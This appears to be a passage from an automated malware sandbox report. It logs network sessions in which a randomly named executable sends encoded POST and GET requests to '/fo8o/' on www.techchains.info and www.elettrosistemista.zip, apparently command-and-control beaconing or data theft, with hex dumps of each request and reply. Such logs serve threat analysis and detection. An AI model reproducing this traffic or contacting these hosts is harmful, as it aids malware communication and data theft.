7a 65 58 49 75 50 4d 64 69 4a 55 45 51 4d 4d 61 68 34 6b 7a 47 4a 59 76 45 56 53 33 43 49 6c 33 4c 79 68 48 6c 75 51 73 59 52 78 54 6f 54 4a 58 4a 50 64 67 77 3d 3d Data Ascii: 6d6p=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIuPMdiJUEQMMah4kzGJYvEVS3CIl3LyhHluQsYRxToTJXJPdgw==
Jan 13, 2025 09:29:03.231108904 CET	637	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 08:29:03 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49989	66.29.149.46	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:05.176992893 CET	814	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 74 70 7a 41 73 54 67 74 76 55 46 6b 71 49 68 36 6c 51 4d 66 32 6a 61 62 75 5a 32 50 69 66 38 47 63 62 4d 69 59 56 61 74 6d 59 74 41 66 45 72 30 41 3d Data Ascii: 6d6p=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtpzAsTgtvUFkqIh6lQMf2jabuZ2Pif8GcbMiYVatmYtAfEr0A=
Jan 13, 2025 09:29:05.776899099 CET	637	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 08:29:05 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49990	66.29.149.46	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:07.711359024 CET	1827	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 56 4d 79 76 78 4d 77 70 4e 50 66 42 6b 57 4f 67 36 39 52 57 38 71 68 53 34 37 52 2b 35 76 2f 74 56 59 78 4a 79 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 76 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 [TRUNCATED] Data Ascii: 6d6p=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1yVMyvxMwpNPfBkWOg69RW8qhS47R+5v/tVYxJy0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MvLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpujvUuYZqEGG7eh5yUsT1M8SwhhSDkRkp1e8S11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNZNQhFD3qsu2aTnzX3pf/5G3gyC993xzb1N88McQTyiy4r2BWzkLZoqkTdpzuHDPRtmGo//9keV4lDSxGV53CY7j9uiapAE6q6EEKCeKRE5aT26bYFha95iNe9ZT35M9OHmqq92UJvkC/+AeDUEY30vOFOpR65L0C2KyFHB2nXiPSOR0KiX2Cg7RtHNuRzXyUnr3K0e3zQ82TwPSQsZDQ9Db/I4GEl+zKlYkrPbJ0zFa8u3YZykGxfEX8gzGvdVJ9ciIoNtiFI3jthpewWGFtpg49LFAiMbe3VTGnTUoH6/NpdGIVW4C4HAYRuRLBS8x6LTOaUhRloJFqTrjjwNRH6Ya/l6JXFju1AG4t1M46OaaM6GTV6WyGPZviAQfN2PXZlpq4k5mLPHHDdRcYdtPlHZ/bVlYC5zvZb6i5FjkpdQIbfwYZ4YFtFfB6tZzMtctu074I7LnolpdaPU5YLwp0uPlKScZXCTxPPQEaPVLoJAv7joE4SF+XczP/tmXxtBG4WN1lh4EMjTGTxSiA [TRUNCATED]
Jan 13, 2025 09:29:08.323182106 CET	637	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 08:29:08 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49991	66.29.149.46	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:10.311863899 CET	529	OUT	GET /fo8o/?6d6p=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5havgW/E7FBnRHSVLxLOmP4JSsfFuCtKITU5HHIETNdwZpVM5nJMc2sOIT&DZb=zf440xcx6XAL HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 13, 2025 09:29:10.892854929 CET	652	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 08:29:10 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49992	195.110.124.133	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:16.008424997 CET	812	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 68 51 72 32 34 55 50 4f 65 4f 48 37 6d 6c 55 63 63 63 57 4f 67 54 45 6c 35 38 43 49 76 6e 2f 2f 49 50 75 4b 72 6b 64 37 76 65 52 72 49 4f 79 4d 77 3d 3d Data Ascii: 6d6p=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCihQr24UPOeOH7mlUcccWOgTEl58CIvn//IPuKrkd7veRrIOyMw==
Jan 13, 2025 09:29:16.673105001 CET	367	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 08:29:16 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49993	195.110.124.133	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:18.535356045 CET	832	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 2f 68 37 59 30 66 4a 36 4b 39 4a 4c 32 48 4a 51 38 6b 59 37 37 6d 61 76 32 61 50 48 4d 78 2f 61 49 75 46 4d 6f 53 42 46 58 6e 59 56 79 52 44 45 3d Data Ascii: 6d6p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxr/h7Y0fJ6K9JL2HJQ8kY77mav2aPHMx/aIuFMoSBFXnYVyRDE=
Jan 13, 2025 09:29:19.209430933 CET	367	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 08:29:19 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49994	195.110.124.133	80	6956	C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 09:29:21.066580057 CET	1845	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 36 64 36 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 43 66 2f 6e 61 30 53 51 6f 71 57 39 59 75 4c 4b 61 73 53 35 6f 76 44 76 4d 48 39 54 71 53 68 6a 75 48 2b 76 48 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 41 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 [TRUNCATED] Data Ascii: 6d6p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKCf/na0SQoqW9YuLKasS5ovDvMH9TqShjuH+vHZ5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuACufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adEqOILL5/6q0q+bu10hfKbeXTHwmad3EfxeVQmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQbK9xEv/in+OrZPJoNm++Q2Ml2G3CjwTVwxuY6wk3GJOtREbdAwEduKbLiFFAMZhBe1HJZst1zV3/yLKsWMLUyEnXJMlkNI6BEFmEyU+qJOWxkDp7bE/n2nTR3tx3hmt0KagIEgQR47GXnnnh724DU5+HxVsx6tXkDDTF6Uu1e+TCZxwY8kbZmbeLq4pB6gRXTcZzsbk4JdOwgt0xmriPW6DV2v2kv2ja/mpjKYncWXoDQoSZV0ejDIOnstC7tZI2CPklxxAJ9px02osJwm7n0gf/uQMCgaLXB8fYcD2DM28uXdYFXQA0UuMOjSYV4zSK/FUVuP/uM/5sOgUflyJIgaCNGFkxsuhuYeOnCEWNnhmnk/QUj8gkXgZCt5eM5YwZ3aqTm